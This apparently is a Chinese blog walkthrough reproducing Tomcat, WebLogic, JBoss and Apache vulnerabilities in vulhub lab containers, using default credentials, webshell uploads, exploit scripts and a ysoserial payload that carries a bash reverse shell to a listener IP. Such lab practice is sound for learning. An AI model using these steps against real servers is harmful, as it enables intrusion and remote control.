一、Tomcat
Tomcat put方法任意文件寫入漏洞
環境搭建,啟動時端口被占用就改yml配置文件,改成8081端口。(我這里是8080)
cd vulhub-master/tomcat/CVE-2017-12615
docker-compose up -d
去抓包,改成put提交。下面的內容是用哥斯拉生成的木馬文件。把1.jsp打開把內容復制進來就可以了。放行后去訪問一下。
放行后去訪問一下,然后用工具連接就可以了。
后臺弱口令部署war包
開環境。?打不開就換個端口。
cd tomcat8
docker-compose up -d
把生成的1.jsp文件先壓縮一下,然后把后綴改成war。
點Manager App我們去上傳文件。(賬號密碼都是tomcat)
去放問一下,然后用工具連接一下即可。
Tomcat文件包含漏洞
tomcat默認的conf/server.xml中配置了2個Connector,一個為8080的對外提供的HTTP協議端口,另一個是默認的8009AJP協議端口,兩個端口默認均監聽在外網ip。
環境搭建
cd vulhub-master/tomcat/CVE-2020-1938
docker-compose up -d
開了環境之后把腳本文件拖進去,執行下面命令(如果有python2直接用python運行就行)。
python2 CVE-2020-1938.py -p 8009 -f /WEB-INF/web.xml 47.93.51.60
二、WebLogic
后臺弱口令GetShell
默認賬號密碼:weblogic/Oracle@123
cd vulhub-master/weblogic/weak_password
docker-compose up -d
開環境時出現錯誤,改一下yml文件。再重新啟動一下就可以了。
訪問下面這個頁面用賬號密碼登陸進去。
http://47.93.51.60:7001/console/login/LoginForm.jsp
登錄后臺后,點擊部署,點擊安裝,點擊上傳文件,把我們生成的1.war上傳上去。
嘗試用哥斯拉連接,連接成功即可。
WebLogic T3協議反序列化命令執行漏洞
使用工具掃漏洞急用即可。
cd vulhub-master/weblogic/CVE-2018-2628
docker-compose up -d
WebLogic文件任意上傳漏洞
cd vulhub-master/weblogic/CVE-2018-2894
docker-compose up -d
這里環境后臺密碼是隨機得,獲取密碼:docker-compose logs | grep password?
訪問http://47.93.51.60:7001/console/login/LoginForm.jsp 。
由于博主的weblogic頁面打不開,就不給大家示范了。
三、Jboss
Jboss JMXInvokerServlet 反序列化漏洞
cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d
http://47.93.51.60:8080/invoker/JMXInvokerServlet
訪問時下載了一個文件。說明接口開放,此接口存在反序列化漏洞。下載ysoserial工具進行漏洞利用。
將反彈shell進行base64編碼。同時打開監聽。
bash -i >& /dev/tcp/47.93.51.60/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45My41MS42MC82NjY2IDA+JjEg
執行下面兩個代碼,就可以監聽到了。?
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45My41MS42MC82NjY2IDA+JjEg}|{base64,-d}| {bash,-i} ">exp.ser
curl http://47.93.51.60:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
JBossMQ JMS 反序列化漏洞?
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
http://47.93.51.60:8080/jbossmq-httpil/HTTPServerILServlet
在我們的工具里運行以下代碼。
python jexboss.py -u http://47.93.51.60:8080
JBoss 5.x/6.x反序列化漏洞
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
訪問主頁。?
該漏洞出現在/invoker/readonly中 ,服務器將用戶post請求內容進行反序列化。返回500,說明頁?存在,此頁面存在反序列化漏洞。
http://47.93.51.60:8080/invoker/readonly
使用工具進行檢測,執行成功即可。
Administration Console弱口令
賬戶密碼:admin,vulhub
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
http://47.93.51.60:8080/admin-console/login.seam
文件名是數字時,上傳出錯了,所以我改成字母了,就上傳成功了。
http://47.93.51.60:8080/a/a.jsp
訪問一下,沒有報錯就說明上傳成功了,用哥斯拉連接試試。
低版本JMX Console未授權訪問Getshell
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
這里我們使用的復現環境不存在,所以需要密碼(正常環境無需密碼直接可進入)
賬號密碼:admin,admin?
把我們的a.war文件拖進去之后開啟80端口,就可以看見a.war了。
然后把a.war的遠程路徑輸進去。
去訪問一下就可以了。
http://47.93.51.60:8080/a/a.jsp
高版本JMX Console未授權
賬號密碼:admin,vulhub
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
http://47.93.51.60:8080/a/a.jsp
沒有出錯說明上傳成功。
四、Apache
Apache HTTP Server 路徑穿越漏洞
docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
打開我們的工具。存在文件讀取漏洞,但是我們執行命令出現了亂碼。
因為瀏覽器不能解碼,那我們可以去抓包執行我們的命令。